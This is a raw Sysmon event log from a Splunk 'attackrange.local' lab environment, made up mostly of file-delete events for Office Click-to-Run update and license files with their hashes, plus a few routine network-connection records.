Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\C2RManifest.office32ww.msi.16.x-none.xmlMD5=B5CF5D15A8E6C6F2EB99A5645A2C2336,SHA256=F3B3A6D7EAFD8952D6C56B76D084CBC2617407B80E406488CA4961D4E905F38C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066915Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\C2RManifest.office32mui.msi.16.en-us.xmlMD5=ADA34B241139F06ADDC86A9E8D1108F0,SHA256=3069814DB0A03ED2CE383CB97739D07545D3B67A2B532D9C07D0D5AA3C6A4F3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066914Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\C2RManifest.lyncmui.msi.16.en-us.xmlMD5=E82F94BC40DEB0A34B7B69D32BA62D2A,SHA256=7B936241D31791530C19F3F02DBC651780014F5EA8976D5CBA539348FF8DFD7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066913Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xmlMD5=1FF5C190718BB1BCEEEB5FCE66CC12E8,SHA256=5ECCCAFF078D60F51805785DA1A5FD81A7721BCBC582119926888647671F3250,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066912Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\C2RManifest.excelmui.msi.16.en-us.xmlMD5=766A6735C80A5E7D1AB1EB9A69EF6B75,SHA256=5006CF438B8E43BEC82F62C62E35EC637594DA9573DD19ABDAAC78113EA8E3F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066911Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xmlMD5=F716CCC17D520A754EF088148EC591FC,SHA256=8325A3009408CEF24E00AF5341E257F46FD6B7E2C70DAC4CE01B0623A62C2079,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066910Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\C2RManifest.dcfmui.msi.16.en-us.xmlMD5=2693CB4D0D47298D60C5B4210D567E56,SHA256=D98DEC16B13C3E4A23823BE0BCD45F685C6DC690AE28954C0C18075E77898F20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066909Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xmlMD5=C79D743DC754585C49FFC41A15C33C71,SHA256=5AA9E0D9F982FFA00C39EE9070A398E64F33959181EBFE9D2EE497F59EA10C12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066908Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\C2RManifest.accessmuiset.msi.16.en-us.xmlMD5=36E76B3591F55A2E809A268D4D88BF6B,SHA256=F39BB0F104FB228469941E4D466C7D0BC4E7C8D309E14426A93AD5A90F4F14B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066907Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\C2RManifest.accessmui.msi.16.en-us.xmlMD5=25BB5DA27868A6F79A646D8D04FE35CE,SHA256=920EB450E2C0B2A2D10D8F6D5327A36E28CDCE240301A5900BB94D3DCCC94091,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066906Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\C2RManifest.Access.Access.x-none.msi.16.x-none.xmlMD5=19058F2F1E7960DD0894A8EB602A0F13,SHA256=1CDDE0F086608B205579201548F7131F9B3244489C22329F744371EC1291F221,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066905Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\C2RIntLoc.en-us.16.msiMD5=E20FBF0B3B3A743FF322CF09889E384F,SHA256=58B06E326B3EE4D5ABD578EAC08CDA92CE97F21AA7CE6CC77EA20CAF8B9777EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066904Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.830{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\C2RInt.16.msiMD5=48C6BB846D0E859DC7795CFB7E7B387D,SHA256=C689BD3ADAFE767C6C61C56DA5D6F8FA0971EC0DF8BD7A669655C12DBBA5B19F,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000066903Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:11.275{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57500-false10.0.1.12-8000- 354300x800000000000000066902Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:11.188{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com65369-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000066901Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Integration\Addons\Teams.msiMD5=7CDFAA6CD31B97CC5A0BC481BA1A60F2,SHA256=CA79EE7BC25052D73CC0044E98DA169375FE9F7E2F9652392CE2FF4D370987CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066900Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:12.423{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2754E587FD25BC2898CAD46612196B94,SHA256=824F3FBB969ECB5073579C83F3E73F50B041D0992CDCCC1972D2633B75F26E4E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049725Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:09.657{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52495-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000049724Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:12.518{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9C827174D3CE36DCE43F5C4DC792BAD,SHA256=6C83F15E3003D764F0B3DB974858666093B8E75E7B8C2F37226C7FBC7F33C160,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049723Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:12.018{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=62E5A2CB7A4C7D3BDCBD876D57568FEE,SHA256=D7EB35BA25C0E504FCAA9A686C236D910C95F9CCAFCA050D0268F5A0A90EB104,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067214Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365BusinessR_Subscription-ul-oob.xrm-msMD5=5C8FF2F5E14E9B5DA9EB3A50CCB55BE8,SHA256=CD00B9CE3A121A87C3D4FE8D17F23036476F08262B885CBAAAD18761275008DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067213Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365BusinessR_Subscription-ppd.xrm-msMD5=92EF5FCA468326AE0D4DE1E7D8B73130,SHA256=5A801BE7600670DD7915720BD4AC48393AAC79B7E4C5F6B42E6D7AD6A473F575,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067212Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365BusinessR_Subscription-pl.xrm-msMD5=DE8296DE1C842714D4CF6E5FE3CFAF4B,SHA256=0686F1FA720731792BED3D0BD255A813B8022F088F73884B98F56F9AB9D985F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067211Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365BusinessR_Grace-ul-oob.xrm-msMD5=66CC2B6BF88E63A5DD4FF6EA874DF02E,SHA256=D964B740425374ACB87BC85BBE85E7F2BA637819C07AC9D87055D5E313BFC5CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067210Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365BusinessR_Grace-ppd.xrm-msMD5=CB5958B43D9BBB41A661E056ED7B4E8E,SHA256=1C4736958409E3A050F40996234E46DC5068FB7D5417483FE04AF2A7168BEACF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067209Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365BusinessDemoR_BypassTrial365-ul-oob.xrm-msMD5=9B624FA8689CC6B7AECEB5ED90352FC7,SHA256=88A0CD3AD83F9C19CDF66446DF78AF235BE8B8E7B836910143B1C5243DC6F7DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067208Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365BusinessDemoR_BypassTrial365-ppd.xrm-msMD5=14738B918B5C726868DF8B788FFE76B4,SHA256=F882601C90D19D7C669C5F6677148C6A91919C1621F8B6B55F86B38FA060F9F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067207Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoVL_MAK-ul-phn.xrm-msMD5=2AB681B87D094EF574C06A9029DF770F,SHA256=91B7A02A02BF6BEC81E5D2C045B59B6B98941CD48D4101B03461281C86756983,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067206Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoVL_MAK-ul-oob.xrm-msMD5=4A5D4BAC69DAB41EBBD04DCE99D9507E,SHA256=20816A3A66F4321D1B6EC83151D7B9F855CC08788931F9323553DF719AEBF18C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067205Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoVL_MAK-ppd.xrm-msMD5=121A3916A3447DE01070A71BD1150C8F,SHA256=5D994383545CF51EC7B2EF92DB1B5A3D37C9B2CCC86D94F7D367C96C940ECC78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067204Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoVL_MAK-pl.xrm-msMD5=ED77F8DCA081CF84B521BA9ACA7B2988,SHA256=127711D686D8CCAC164D718C332E234F0C81C618DA796FC58F36AED26D8C2212,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067203Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoVL_KMS_Client-ul.xrm-msMD5=688BC47A32F14713441C9995EB04691E,SHA256=BD768AF68C47FE8BA908CA161FDC0E97A46C0046176C39DCB2A94293A3E38822,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067202Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoVL_KMS_Client-ul-oob.xrm-msMD5=090133561F8FFD9AFEBCB1449455EBC2,SHA256=14E7D1913986BB797F81BB1F0DD97B0BC0D21234FB3221E7ACC7D3E5FE3E988E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067201Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoVL_KMS_Client-ppd.xrm-msMD5=03419F17DB106DF62E0127A7C100805A,SHA256=B77CAD337B245C6F6C9B18462CA24765D38B7A557A4B36947828442044A8C317,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067200Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_ViewOnly_ZeroGrace-ul-oob.xrm-msMD5=E5CD521B6654D3B0FAB8E42232DCC1B6,SHA256=8FD6C2FBEFA9DA7BE950A25E6FFED0F74E123F484C714FE75D015FDBF8CB3024,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067199Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_ViewOnly_ZeroGrace-ppd.xrm-msMD5=07795B281786DD30951E07B30633030E,SHA256=728EF7A67B9AE7FFE58CF5E757D13D56332E017EEB1C9221431D95D6B9C710EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067198Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_Trial-ul-oob.xrm-msMD5=D2FFF20B02ED22417265750D95A38F0B,SHA256=1A6D1E42209B3CBD172B23A3B495A859FB9D363DA77DAC1CFBF95B5BEA643315,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067197Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_Trial-ppd.xrm-msMD5=ED0FA18556E9A53E5AA76EE9C4EB4488,SHA256=064928B68AAD0DA90080E37F91923DD46F0C5EB3A153337F880E9B96AC61C59F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067196Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_Trial-pl.xrm-msMD5=7C8101805182AA5BEA857A9D3A9A8BBD,SHA256=137A42F9988CCB959A5119E54BA7C9D0A421EF45F27F3A9F45710D7E11E28FB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067195Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_SubTrial2-ul-oob.xrm-msMD5=5865E7C73B5A8CABF80C74DBC29AD597,SHA256=7D177420F9D5C67F5E7331EE0DD69B3E7974E6860FBDB617596B0FE11030860B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067194Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_SubTrial2-ppd.xrm-msMD5=67A87DA2AB69398C8C11775945056328,SHA256=929AB90139C091B17E724B4F5E4CBB2D5302145B5DCD43A67DDB13B39AA59DDC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067193Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_SubTrial2-pl.xrm-msMD5=793C00B86BD5419D0233A43E9A4BCB56,SHA256=8A652D3368FD0809D7AD84523D93C2F4EF50BD5F02D611FE33970FC4E727FC2D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067192Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_SubTrial-ul-oob.xrm-msMD5=508634F89BB07BACA51DE329FF55AC80,SHA256=8019F5CE16EE84B8316A8675D7CEE96603FDFC6E24FF422F84D8137787075D3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067191Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_SubTrial-ppd.xrm-msMD5=40F17AE1B9A8D1A6F82532BF3E5CAF54,SHA256=AB2D641EB6C99557E62FF19ECF8322B5643B8005F842C5C59CA174F268B4E314,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067190Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_SubTrial-pl.xrm-msMD5=A780545AA99FAE52EE42F0ADD6551638,SHA256=6D874C33B580F4DE3A4D1C1BAF113F9846E4AFAD1AA357CBCCE27D7768492193,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067189Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\MondoR_SubTest2-ul-oob.xrm-msMD5=B8035AF11A4BAC6F2B37F58AB4A63E47,SHA256=EC34D2188F15657D6DFD27BCB34877FF8E61067AEC392433E38523CC26CDFFE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067188Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 